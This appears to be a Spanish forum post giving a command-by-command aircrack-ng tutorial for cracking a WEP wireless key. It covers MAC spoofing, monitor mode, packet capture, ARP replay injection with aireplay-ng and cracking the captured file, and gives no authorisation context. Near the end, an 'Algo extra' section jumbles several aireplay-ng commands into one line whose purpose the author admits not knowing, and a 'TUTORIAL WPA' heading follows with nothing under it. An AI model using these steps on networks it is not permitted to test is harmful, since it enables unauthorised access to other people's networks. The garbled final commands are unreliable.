1) Saber cual es nuestra tarjeta de red (wlan0, eth0, eth1, etc...

) dijo: airmon-ng 2) Deshabilitar tarjeta de red y poder hacer el cambio de MAC: dijo: airmon-ng stop wlan0 ifconfig wlan0 down 3) Hacer cambio de MAC dijo: macchanger --mac 00:11:22:33:44:55 wlan0 4) Habilitar tarjeta de red en modo monitor dijo: airmon-ng start wlan0 5) Ver redes inalambricas dentro del alcance dijo: airodump-ng wlan0 BSSID: mac del router PWR: intensidad de seal CH: canal de la red ENC: tipo de contrasea ESSID: Nombre de la red Ya que sepamos que red es la que queremos, presionamos CTRL+C para detener la bu squeda y nos permita copiar al portapapeles, el numero de canal (CH) y la direcc ion MAC del router (BSSID) 6) Para ponernos en modo monitor y capturar paquetes dijo: airodump-ng -c <CH> -w <FILE> --bssid <BSSID> wlan0 Sustituimos <CH> por el numero de canal, <BSSID> por la direccion MAC y <FILE> p or el nombre del archivo donde se guardaran los paquetes capturados, todo estos sin <> 7) Esperamos a que se junten mas de 20000 paquetes (#DATA), los necesarios para poder desencriptar una calve WEP y por ultimo tecleamos dijo: aircrack-ng <FILE>-01.cap Sustituyendo <FILE> por el nombre del archivo que escoguimos Poco trafico Si a la hora de capturar paquetes, no hay suficientes o avanza muy lento, teclea

mos lo siguiente: primero nos asociamos: dijo: aireplay-ng -1 0 -a <BSSID> wlan0 si no nos podemos asociar, el modem puede que este muy lejos o problemas de ese tipo segundo, generamos mas paquetes dijo: aireplay-ng -3 -b <BSSID> wlan0 Con esto el #Data avanza mucho mas rapido, y por lo tanto, mas rapido el proceso .

Algo extra Estas lineas nose bien bien cual sea su funcion, pero igual y sirve para generar mas paquetes dijo: aireplay-ng aireplay-ng aireplay-ng aireplay-ng -1 -2 -3 -5 0 -a <BSSID> wlan0 -p 0841 -c <BSSID> wlan0 -b <BSSID> wlan0 -b <BSSID> wlan0

dijo: TUTORIAL WPA

0 Me gusta 0 Com